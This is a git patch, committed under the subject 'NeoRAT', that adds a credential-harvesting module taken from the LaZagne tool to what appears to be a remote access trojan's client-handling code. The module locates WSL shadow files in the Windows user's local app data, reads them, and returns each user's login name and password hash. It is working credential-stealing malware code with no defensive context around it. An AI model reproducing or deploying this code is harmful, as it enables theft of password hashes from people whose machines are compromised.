From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/sysadmin/wsl.py              | 44 ++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/wsl.py

(limited to 'foreign/client_handling/lazagne/softwares/sysadmin/wsl.py')

diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py b/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py
new file mode 100644
index 0000000..b4e63e0
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py
@@ -0,0 +1,44 @@
+# -*- coding: utf-8 -*-
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+import os
+
+
+class Wsl(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'wsl', 'sysadmin')
+
+    def run(self):
+        pwd_found = []
+        shadow_files_list = []
+
+        # Old WSL PATH
+        old_path = os.path.join(constant.profile['LOCALAPPDATA'], u'lxss\\rootfs\\etc\\shadow')
+
+        if os.path.exists(old_path):
+            shadow_files_list.append(old_path)
+
+        # New WSL PATH need to look into Package folder
+        new_path = os.path.join(constant.profile['LOCALAPPDATA'], u'Packages\\')
+        if os.path.exists(new_path):
+            for root, dirs, files in os.walk(new_path):
+                for file in files:
+                    if file == "shadow":
+                        shadow_files_list.append(os.path.join(root, file))
+
+        # Extract the hashes
+        for shadow in shadow_files_list:
+            with open(shadow, 'r') as shadow_file:
+                for line in shadow_file.readlines():
+                    user_hash = line.replace('\n', '')
+                    line = user_hash.split(':')
+
+                    # Check if a password is defined
+                    if not line[1] in ['x', '*', '!']:
+                        pwd_found.append({
+                            'Hash': ':'.join(user_hash.split(':')[1:]),
+                            'Login': user_hash.split(':')[0].replace('\n', '')
+                        })
+        return pwd_found
-- 
cgit v1.2.3